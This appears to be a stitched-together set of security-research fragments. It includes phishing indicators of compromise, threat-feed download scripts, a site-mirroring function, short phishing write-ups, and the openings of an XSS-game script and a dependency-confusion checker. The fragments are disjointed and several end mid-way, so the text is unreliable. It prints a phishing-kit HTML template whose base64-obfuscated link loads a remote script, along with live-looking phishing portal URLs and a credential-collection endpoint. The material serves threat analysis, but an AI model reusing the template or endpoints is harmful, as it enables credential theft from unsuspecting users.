The following portal is using Microsoft Forms to send out the emails to potential victims.
Form URL: https://ncv.microsoft.com/xfzlQmbcLr
Portal URL: https://27-02-0-f39h5r8g-wrfgw0e8c3-t0rf7-0wrg-g7.obs.ap-southeast-2.myhuaweicloud.com/vt65g-09we-0t9hng-0w9rmvfj-e09thg-9rjfg9-er.html?AWSAccessKeyId=FQWNSQAJNPZJXV8B91KK&Expires=1677494075&Signature=cBYwgWA9mU%2BlQTS/FMhe6QYGcoE%3D
POST location: https://techsmashwru.ru/.cas/next.php
#!/bin/bash
set -euo pipefail
folder_prefix="./feeds/" # $(date +%Y/%m/%d)
mkdir -p "${folder_prefix}"
rm -f "${folder_prefix}"/*.txt
# -f makes curl return non-zero on HTTP errors so a failed download is not silently written as an empty feed
# Phishing Army extended blocklist (one domain per line)
curl -fsSL https://phishing.army/download/phishing_army_blocklist_extended.txt -o "${folder_prefix}/phishing_army_domains.txt"
# CERT Polska hole list is tab-separated; the second column holds the domain
curl -fsSL https://hole.cert.pl/domains/domains.csv | cut -f 2 > "${folder_prefix}/cert_pl_domains.txt"
# URLAbuse public phishing URL feed
curl -fsSL https://urlabuse.com/public/data/phishing_url.txt -o "${folder_prefix}/urlabuse_urls.txt"
# ThreatView high-confidence malicious domain feed
curl -fsSL https://threatview.io/Downloads/DOMAIN-High-Confidence-Feed.txt -o "${folder_prefix}/threatview_domains.txt"
# Mirror a site for offline analysis, staying inside the given domain.
# Usage: scrapy <domain> <start-url>  (the start-url argument and closing brace are assumed; the gist is cut off here)
# --no-clobber was dropped: --mirror implies -N (timestamping) and wget refuses to combine -N with -nc.
scrapy () {
    wget \
        --mirror \
        --page-requisites \
        --adjust-extension \
        --convert-links \
        --restrict-file-names=windows \
        --domains="$1" \
        --no-parent \
        "$2"
}
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<script>
let EMAIL_ADDRESS = "user@company.com"; // Change this to the email address
let BASED64_ENCODED_EMAIL = ""; // If you wish to encode the email address, enter the base64-encoded email and leave the email address blank; otherwise leave this field blank
let SCRIPT_LINK_URL = window.atob("aHR0cHM6Ly9tZWdhdGVycmEuaHUvc2NyaXB0LnBocA"); // Enter the script link here
</script>
</head>
</html>
These are the contents of a phishing attempt I received recently.
- Receive an attachment.html, usually from a free email service.
- The email contains an HTML file with encoded JS that would call http://angelotti.it/cms/moj1.js
- Once you open the HTML file, an Outlook login portal is displayed to authenticate.
IoCs:
Today I received an interesting phishing message via Messenger from a friend, who is also a tech guy, so it was surprising that he got compromised.
The initial message said:
Is it you in this video? 😱
https://zu7.eu/L3VAD6EzsR
The URL, when loaded from any browser other than a mobile one, will redirect to twitch.tv; otherwise it would display the following HTML:
import requests
import time
import urllib.parse
from bs4 import BeautifulSoup
from selenium import webdriver
from selenium.common.exceptions import NoAlertPresentException

# Google's XSS game training level: fetch the frame and parse it
url = "https://xss-game.appspot.com/level1/frame"
response = requests.get(url, timeout=10)
soup = BeautifulSoup(response.text, "html.parser")  # explicit parser avoids the bs4 warning
# Source https://github.com/Esox-Lucius/PiHoleblocklists
#!/usr/bin/env python3
# https://www.bleepingcomputer.com/news/security/researcher-hacks-over-35-tech-firms-in-novel-supply-chain-attack/
# The following script finds all package.json files in the current dir and checks whether any referenced
# dependency has no public package available, which leaves your application open to a dependency-confusion
# supply-chain attack.
# Simply run ./packagejson.py in your root repository directory.
import json
import requests
from pathlib import Path
import urllib.parse